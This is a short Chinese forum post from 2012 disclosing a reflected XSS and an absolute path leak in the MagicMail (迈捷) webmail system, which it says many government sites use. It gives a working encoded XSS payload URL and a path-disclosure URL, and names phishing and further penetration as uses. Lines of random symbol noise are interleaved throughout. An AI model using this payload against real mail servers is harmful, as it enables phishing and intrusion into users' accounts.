今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
' p" z! \) d/ T( m: Q: C' ^: Z
" a, q; I2 k/ ~% N c& _, x: B
. Z9 K, D+ e- `; b& h4 n* ?包含 一个反射性XSS 以及 绝对路径泄漏
% x1 G, U% u8 e) @$ @% s; a7 d看了看 貌似全部是linux的。
) \# i! h8 L# E7 U" t2 ^, w4 W" G ! V- p$ ?9 B7 i2 I. S
关键字:迈捷邮件系统 by MagicMail
0 q$ ~& \, H6 H% ]. Z6 `
8 [+ Q' q7 ~, D' y可以看到很多政府网站都用这个邮件系统5 m8 g/ a) g6 i9 w* T6 B8 m
1 b- W- {; p& E9 N3 J2 T A绝对路径 http://madman.in/index.php?login_type=declare&language=
7 H4 {& s* p" P: A! z; E9 {) r" m8 P" o6 K4 y# I4 ^
! P$ I0 ~" o. Y' H" S
* r5 N" q+ Y& h& n, P9 F+ Z& Y! K6 jXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E- e; `' _% D! i: o- f, H
. G, C* b7 m9 @# P. Y# Z
6 k" h! j% i* G( j5 F0 J9 i: _1 q0 c3 A* `- Z2 Z
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
5 M1 X9 e" j; A1 O- Q$ t
- ^. e, ]. x# m) k" y C修复方案:看官方补丁吧。
, [. [$ W5 D$ o. ~2 o3 G1 t! ] |
发表于 2012-11-9 20:38:41
收藏
支持
反对